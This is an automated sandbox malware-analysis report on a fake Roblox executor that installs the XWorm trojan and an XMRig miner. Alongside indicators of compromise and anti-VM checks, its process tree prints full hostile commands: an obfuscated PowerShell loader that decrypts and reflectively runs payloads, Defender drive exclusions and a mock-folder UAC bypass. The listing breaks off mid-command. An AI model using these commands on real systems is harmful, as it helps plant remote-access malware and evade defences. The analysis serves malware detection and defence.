xmrig | e9397b42b5c3f7770b873a76355bd59cbe097f30dc9b9349e9787832bbe9767a

Analysis

max time kernel
147s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
22-05-2024 18:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RblxExecutor.exe
Size

1.6MB
MD5

3a235f7f491d95d4727320239c0b4cb7
SHA1

b66d02b69f9d2cf011164406c6bc93a6728a65eb
SHA256

e9397b42b5c3f7770b873a76355bd59cbe097f30dc9b9349e9787832bbe9767a
SHA512

fa40f2d94bbe25372fc5eecb87168c3a55fb3fff1486ebd57d1f944760b43cc77a891fdbc246d5379e02b88b7f4f6abea0c94162e88ff87cabd246c7d8a5d83b
SSDEEP

24576:O83AQ99hyIMVdMJgsIX3b9M5Mm2f+qnbyy3q3PIMPKgPe8CWZoPJRMyoE:OWAE9AInJfF8dbRiteGmJKy

Score

10^/10

xmrig xworm evasion execution miner rat trojan

Malware Config

Extracted

Family

xworm

185.196.8.135:7000

Attributes

install_file
USB.exe

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3248-56-0x000001BFCD410000-0x000001BFCD428000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

RblxExecutor.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	RblxExecutor.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__	RblxExecutor.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__	RblxExecutor.exe

Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

RblxExecutor.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions RblxExecutor.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	RblxExecutor.exe

Looks for VirtualBox drivers on disk 2 TTPs 4 IoCs

evasion

File and Directory Discovery

T1083

Virtualization/Sandbox Evasion

T1497

Processes:

RblxExecutor.exe

description	ioc	process
File opened (read-only)	C:\Windows\System32\drivers\VBoxSF.sys	RblxExecutor.exe
File opened (read-only)	C:\Windows\System32\drivers\VBoxVideo.sys	RblxExecutor.exe
File opened (read-only)	C:\Windows\System32\drivers\VBoxMouse.sys	RblxExecutor.exe
File opened (read-only)	C:\Windows\System32\drivers\VBoxGuest.sys	RblxExecutor.exe

XMRig Miner payload 9 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4108-142-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/4108-143-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/4108-148-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/4108-149-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/4108-147-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/4108-145-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/4108-146-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/4108-150-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/4108-151-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig

Blocklisted process makes network request 8 IoCs

Processes:

powershell.exepowershell.exe

flow	pid	process
24	3248	powershell.exe
32	3248	powershell.exe
33	1980	powershell.exe
35	1980	powershell.exe
36	1980	powershell.exe
50	1980	powershell.exe
52	1980	powershell.exe
54	1980	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

3752 powershell.exe
3248 powershell.exe
1980 powershell.exe
2596 powershell.exe
3264 powershell.exe
4660 powershell.exe
968 powershell.exe

pid	process
3752	powershell.exe
3248	powershell.exe
1980	powershell.exe
2596	powershell.exe
3264	powershell.exe
4660	powershell.exe
968	powershell.exe

Looks for VMWare drivers on disk 2 TTPs 2 IoCs

evasion

File and Directory Discovery

T1083

Virtualization/Sandbox Evasion

T1497

Processes:

RblxExecutor.exe

description	ioc	process
File opened (read-only)	C:\Windows\System32\drivers\vmhgfs.sys	RblxExecutor.exe
File opened (read-only)	C:\Windows\System32\drivers\vmmouse.sys	RblxExecutor.exe

Executes dropped EXE 1 IoCs

Processes:

ComputerDefaults.exe

pid process

4264 ComputerDefaults.exe
Loads dropped DLL 1 IoCs

Processes:

ComputerDefaults.exe

pid process

4264 ComputerDefaults.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

51 bitbucket.org
52 bitbucket.org
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

23 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1980 set thread context of 4108 1980 powershell.exe AddInProcess.exe
Enumerates processes with tasklist 1 TTPs 8 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

4448 tasklist.exe
892 tasklist.exe
5064 tasklist.exe
392 tasklist.exe
3684 tasklist.exe
3828 tasklist.exe
2852 tasklist.exe
1132 tasklist.exe
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

RblxExecutor.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName RblxExecutor.exe

pid	process
4264	ComputerDefaults.exe

pid	process
4264	ComputerDefaults.exe

flow	ioc
51	bitbucket.org
52	bitbucket.org

flow	ioc
23	ip-api.com

description	pid	process	target process
PID 1980 set thread context of 4108	1980	powershell.exe	AddInProcess.exe

pid	process
4448	tasklist.exe
892	tasklist.exe
5064	tasklist.exe
392	tasklist.exe
3684	tasklist.exe
3828	tasklist.exe
2852	tasklist.exe
1132	tasklist.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	RblxExecutor.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

RblxExecutor.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4200	RblxExecutor.exe
4200	RblxExecutor.exe
3248	powershell.exe
1980	powershell.exe
1980	powershell.exe
3248	powershell.exe
968	powershell.exe
968	powershell.exe
968	powershell.exe
2596	powershell.exe
2596	powershell.exe
2596	powershell.exe
3264	powershell.exe
3264	powershell.exe
3264	powershell.exe
3732	powershell.exe
3732	powershell.exe
3732	powershell.exe
4660	powershell.exe
4660	powershell.exe
4660	powershell.exe
3576	powershell.exe
3576	powershell.exe
3576	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3828	tasklist.exe
Token: SeDebugPrivilege	2852	tasklist.exe
Token: SeDebugPrivilege	1132	tasklist.exe
Token: SeDebugPrivilege	4448	tasklist.exe
Token: SeDebugPrivilege	892	tasklist.exe
Token: SeDebugPrivilege	5064	tasklist.exe
Token: SeDebugPrivilege	392	tasklist.exe
Token: SeDebugPrivilege	3684	tasklist.exe
Token: SeDebugPrivilege	3248	powershell.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	2596	powershell.exe
Token: SeDebugPrivilege	3264	powershell.exe
Token: SeDebugPrivilege	3732	powershell.exe
Token: SeIncreaseQuotaPrivilege	3732	powershell.exe
Token: SeSecurityPrivilege	3732	powershell.exe
Token: SeTakeOwnershipPrivilege	3732	powershell.exe
Token: SeLoadDriverPrivilege	3732	powershell.exe
Token: SeSystemProfilePrivilege	3732	powershell.exe
Token: SeSystemtimePrivilege	3732	powershell.exe
Token: SeProfSingleProcessPrivilege	3732	powershell.exe
Token: SeIncBasePriorityPrivilege	3732	powershell.exe
Token: SeCreatePagefilePrivilege	3732	powershell.exe
Token: SeBackupPrivilege	3732	powershell.exe
Token: SeRestorePrivilege	3732	powershell.exe
Token: SeShutdownPrivilege	3732	powershell.exe
Token: SeDebugPrivilege	3732	powershell.exe
Token: SeSystemEnvironmentPrivilege	3732	powershell.exe
Token: SeRemoteShutdownPrivilege	3732	powershell.exe
Token: SeUndockPrivilege	3732	powershell.exe
Token: SeManageVolumePrivilege	3732	powershell.exe
Token: 33	3732	powershell.exe
Token: 34	3732	powershell.exe
Token: 35	3732	powershell.exe
Token: 36	3732	powershell.exe
Token: SeDebugPrivilege	4660	powershell.exe
Token: SeIncreaseQuotaPrivilege	4660	powershell.exe
Token: SeSecurityPrivilege	4660	powershell.exe
Token: SeTakeOwnershipPrivilege	4660	powershell.exe
Token: SeLoadDriverPrivilege	4660	powershell.exe
Token: SeSystemProfilePrivilege	4660	powershell.exe
Token: SeSystemtimePrivilege	4660	powershell.exe
Token: SeProfSingleProcessPrivilege	4660	powershell.exe
Token: SeIncBasePriorityPrivilege	4660	powershell.exe
Token: SeCreatePagefilePrivilege	4660	powershell.exe
Token: SeBackupPrivilege	4660	powershell.exe
Token: SeRestorePrivilege	4660	powershell.exe
Token: SeShutdownPrivilege	4660	powershell.exe
Token: SeDebugPrivilege	4660	powershell.exe
Token: SeSystemEnvironmentPrivilege	4660	powershell.exe
Token: SeRemoteShutdownPrivilege	4660	powershell.exe
Token: SeUndockPrivilege	4660	powershell.exe
Token: SeManageVolumePrivilege	4660	powershell.exe
Token: 33	4660	powershell.exe
Token: 34	4660	powershell.exe
Token: 35	4660	powershell.exe
Token: 36	4660	powershell.exe
Token: SeIncreaseQuotaPrivilege	4660	powershell.exe
Token: SeSecurityPrivilege	4660	powershell.exe
Token: SeTakeOwnershipPrivilege	4660	powershell.exe
Token: SeLoadDriverPrivilege	4660	powershell.exe
Token: SeSystemProfilePrivilege	4660	powershell.exe
Token: SeSystemtimePrivilege	4660	powershell.exe
Token: SeProfSingleProcessPrivilege	4660	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AddInProcess.exe

pid process

4108 AddInProcess.exe

pid	process
4108	AddInProcess.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

RblxExecutor.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4200 wrote to memory of 4408	4200	RblxExecutor.exe	cmd.exe
PID 4200 wrote to memory of 4408	4200	RblxExecutor.exe	cmd.exe
PID 4408 wrote to memory of 3828	4408	cmd.exe	tasklist.exe
PID 4408 wrote to memory of 3828	4408	cmd.exe	tasklist.exe
PID 4408 wrote to memory of 2620	4408	cmd.exe	find.exe
PID 4408 wrote to memory of 2620	4408	cmd.exe	find.exe
PID 4200 wrote to memory of 2064	4200	RblxExecutor.exe	cmd.exe
PID 4200 wrote to memory of 2064	4200	RblxExecutor.exe	cmd.exe
PID 2064 wrote to memory of 2852	2064	cmd.exe	tasklist.exe
PID 2064 wrote to memory of 2852	2064	cmd.exe	tasklist.exe
PID 2064 wrote to memory of 2484	2064	cmd.exe	find.exe
PID 2064 wrote to memory of 2484	2064	cmd.exe	find.exe
PID 4200 wrote to memory of 4036	4200	RblxExecutor.exe	cmd.exe
PID 4200 wrote to memory of 4036	4200	RblxExecutor.exe	cmd.exe
PID 4036 wrote to memory of 1132	4036	cmd.exe	tasklist.exe
PID 4036 wrote to memory of 1132	4036	cmd.exe	tasklist.exe
PID 4036 wrote to memory of 2352	4036	cmd.exe	find.exe
PID 4036 wrote to memory of 2352	4036	cmd.exe	find.exe
PID 4200 wrote to memory of 1584	4200	RblxExecutor.exe	cmd.exe
PID 4200 wrote to memory of 1584	4200	RblxExecutor.exe	cmd.exe
PID 1584 wrote to memory of 4448	1584	cmd.exe	tasklist.exe
PID 1584 wrote to memory of 4448	1584	cmd.exe	tasklist.exe
PID 1584 wrote to memory of 3372	1584	cmd.exe	find.exe
PID 1584 wrote to memory of 3372	1584	cmd.exe	find.exe
PID 4200 wrote to memory of 1028	4200	RblxExecutor.exe	cmd.exe
PID 4200 wrote to memory of 1028	4200	RblxExecutor.exe	cmd.exe
PID 1028 wrote to memory of 892	1028	cmd.exe	tasklist.exe
PID 1028 wrote to memory of 892	1028	cmd.exe	tasklist.exe
PID 1028 wrote to memory of 1636	1028	cmd.exe	find.exe
PID 1028 wrote to memory of 1636	1028	cmd.exe	find.exe
PID 4200 wrote to memory of 4108	4200	RblxExecutor.exe	cmd.exe
PID 4200 wrote to memory of 4108	4200	RblxExecutor.exe	cmd.exe
PID 4108 wrote to memory of 5064	4108	cmd.exe	tasklist.exe
PID 4108 wrote to memory of 5064	4108	cmd.exe	tasklist.exe
PID 4108 wrote to memory of 3524	4108	cmd.exe	find.exe
PID 4108 wrote to memory of 3524	4108	cmd.exe	find.exe
PID 4200 wrote to memory of 228	4200	RblxExecutor.exe	cmd.exe
PID 4200 wrote to memory of 228	4200	RblxExecutor.exe	cmd.exe
PID 228 wrote to memory of 392	228	cmd.exe	tasklist.exe
PID 228 wrote to memory of 392	228	cmd.exe	tasklist.exe
PID 228 wrote to memory of 3580	228	cmd.exe	find.exe
PID 228 wrote to memory of 3580	228	cmd.exe	find.exe
PID 4200 wrote to memory of 2168	4200	RblxExecutor.exe	cmd.exe
PID 4200 wrote to memory of 2168	4200	RblxExecutor.exe	cmd.exe
PID 2168 wrote to memory of 3684	2168	cmd.exe	tasklist.exe
PID 2168 wrote to memory of 3684	2168	cmd.exe	tasklist.exe
PID 2168 wrote to memory of 3964	2168	cmd.exe	find.exe
PID 2168 wrote to memory of 3964	2168	cmd.exe	find.exe
PID 4200 wrote to memory of 1292	4200	RblxExecutor.exe	cmd.exe
PID 4200 wrote to memory of 1292	4200	RblxExecutor.exe	cmd.exe
PID 4200 wrote to memory of 4284	4200	RblxExecutor.exe	cmd.exe
PID 4200 wrote to memory of 4284	4200	RblxExecutor.exe	cmd.exe
PID 4284 wrote to memory of 2752	4284	cmd.exe	cmd.exe
PID 4284 wrote to memory of 2752	4284	cmd.exe	cmd.exe
PID 1292 wrote to memory of 2396	1292	cmd.exe	cmd.exe
PID 1292 wrote to memory of 2396	1292	cmd.exe	cmd.exe
PID 1292 wrote to memory of 3144	1292	cmd.exe	cmd.exe
PID 1292 wrote to memory of 3144	1292	cmd.exe	cmd.exe
PID 1292 wrote to memory of 3248	1292	cmd.exe	powershell.exe
PID 1292 wrote to memory of 3248	1292	cmd.exe	powershell.exe
PID 4284 wrote to memory of 4788	4284	cmd.exe	cmd.exe
PID 4284 wrote to memory of 4788	4284	cmd.exe	cmd.exe
PID 4284 wrote to memory of 1980	4284	cmd.exe	powershell.exe
PID 4284 wrote to memory of 1980	4284	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\RblxExecutor.exe
"C:\Users\Admin\AppData\Local\Temp\RblxExecutor.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare drivers on disk
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmtoolsd.exe" 2>NUL | find /I "vmtoolsd.exe" >NUL
2⤵
- Suspicious use of WriteProcessMemory
PID:4408

C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq vmtoolsd.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3828

C:\Windows\system32\find.exe
find /I "vmtoolsd.exe"
3⤵
PID:2620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vboxservice.exe" 2>NUL | find /I "vboxservice.exe" >NUL
2⤵
- Suspicious use of WriteProcessMemory
PID:2064

C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq vboxservice.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2852

C:\Windows\system32\find.exe
find /I "vboxservice.exe"
3⤵
PID:2484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmwaretray.exe" 2>NUL | find /I "vmwaretray.exe" >NUL
2⤵
- Suspicious use of WriteProcessMemory
PID:4036

C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq vmwaretray.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1132

C:\Windows\system32\find.exe
find /I "vmwaretray.exe"
3⤵
PID:2352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmwareuser.exe" 2>NUL | find /I "vmwareuser.exe" >NUL
2⤵
- Suspicious use of WriteProcessMemory
PID:1584

C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq vmwareuser.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4448

C:\Windows\system32\find.exe
find /I "vmwareuser.exe"
3⤵
PID:3372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmsrvc.exe" 2>NUL | find /I "vmsrvc.exe" >NUL
2⤵
- Suspicious use of WriteProcessMemory
PID:1028

C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq vmsrvc.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:892

C:\Windows\system32\find.exe
find /I "vmsrvc.exe"
3⤵
PID:1636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq Any.Run-VM-X64.exe" 2>NUL | find /I "Any.Run-VM-X64.exe" >NUL
2⤵
- Suspicious use of WriteProcessMemory
PID:4108

C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq Any.Run-VM-X64.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5064

C:\Windows\system32\find.exe
find /I "Any.Run-VM-X64.exe"
3⤵
PID:3524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vboxtray.exe" 2>NUL | find /I "vboxtray.exe" >NUL
2⤵
- Suspicious use of WriteProcessMemory
PID:228

C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq vboxtray.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:392

C:\Windows\system32\find.exe
find /I "vboxtray.exe"
3⤵
PID:3580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq VBoxService.exe" 2>NUL | find /I "VBoxService.exe" >NUL
2⤵
- Suspicious use of WriteProcessMemory
PID:2168

C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq VBoxService.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3684

C:\Windows\system32\find.exe
find /I "VBoxService.exe"
3⤵
PID:3964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\VCRedist.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
3⤵
PID:2396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Al1zbpAcw0p1Fl078pB2HtNXnQs0rbUPPgfd/fVywvU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c9QR5kB90gp/nHGBONlVKA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PUtXp=New-Object System.IO.MemoryStream(,$param_var); $QjusM=New-Object System.IO.MemoryStream; $jUotk=New-Object System.IO.Compression.GZipStream($PUtXp, [IO.Compression.CompressionMode]::Decompress); $jUotk.CopyTo($QjusM); $jUotk.Dispose(); $PUtXp.Dispose(); $QjusM.Dispose(); $QjusM.ToArray();}function execute_function($param_var,$param2_var){ $wbVDd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vzMCH=$wbVDd.EntryPoint; $vzMCH.Invoke($null, $param2_var);}$wGIQB = 'C:\Users\Admin\AppData\Local\Temp\VCRedist.bat';$host.UI.RawUI.WindowTitle = $wGIQB;$pFEsp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wGIQB).Split([Environment]::NewLine);foreach ($QqrJY in $pFEsp) { if ($QqrJY.StartsWith('PDfUAcFoTbCJIUyLDOns')) { $XhjVr=$QqrJY.Substring(20); break; }}$payloads_var=[string[]]$XhjVr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
3⤵
PID:3144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\VCRedists.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:4284

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
3⤵
PID:2752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NW9kWnzh6gT94E6QwCw/S2tqBrnaZOi3/1x2/WmbziY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OAdUsJh095yGIv9rWxpY0Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BRnNz=New-Object System.IO.MemoryStream(,$param_var); $NGgnI=New-Object System.IO.MemoryStream; $wsPQU=New-Object System.IO.Compression.GZipStream($BRnNz, [IO.Compression.CompressionMode]::Decompress); $wsPQU.CopyTo($NGgnI); $wsPQU.Dispose(); $BRnNz.Dispose(); $NGgnI.Dispose(); $NGgnI.ToArray();}function execute_function($param_var,$param2_var){ $IhuXj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KlRZf=$IhuXj.EntryPoint; $KlRZf.Invoke($null, $param2_var);}$dhwZW = 'C:\Users\Admin\AppData\Local\Temp\VCRedists.bat';$host.UI.RawUI.WindowTitle = $dhwZW;$IVamj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($dhwZW).Split([Environment]::NewLine);foreach ($qmDVW in $IVamj) { if ($qmDVW.StartsWith('EPPMCDiGgDdpsovvYHWW')) { $utdAo=$qmDVW.Substring(20); break; }}$payloads_var=[string[]]$utdAo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
3⤵
PID:4788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
4⤵
PID:1832

C:\Windows \System32\ComputerDefaults.exe
"C:\Windows \System32\ComputerDefaults.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4264

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c call SC.cmd
6⤵
PID:704

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
7⤵
PID:2560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NW9kWnzh6gT94E6QwCw/S2tqBrnaZOi3/1x2/WmbziY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OAdUsJh095yGIv9rWxpY0Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BRnNz=New-Object System.IO.MemoryStream(,$param_var); $NGgnI=New-Object System.IO.MemoryStream; $wsPQU=New-Object System.IO.Compression.GZipStream($BRnNz, [IO.Compression.CompressionMode]::Decompress); $wsPQU.CopyTo($NGgnI); $wsPQU.Dispose(); $BRnNz.Dispose(); $NGgnI.Dispose(); $NGgnI.ToArray();}function execute_function($param_var,$param2_var){ $IhuXj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KlRZf=$IhuXj.EntryPoint; $KlRZf.Invoke($null, $param2_var);}$dhwZW = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $dhwZW;$IVamj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($dhwZW).Split([Environment]::NewLine);foreach ($qmDVW in $IVamj) { if ($qmDVW.StartsWith('EPPMCDiGgDdpsovvYHWW')) { $utdAo=$qmDVW.Substring(20); break; }}$payloads_var=[string[]]$utdAo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function 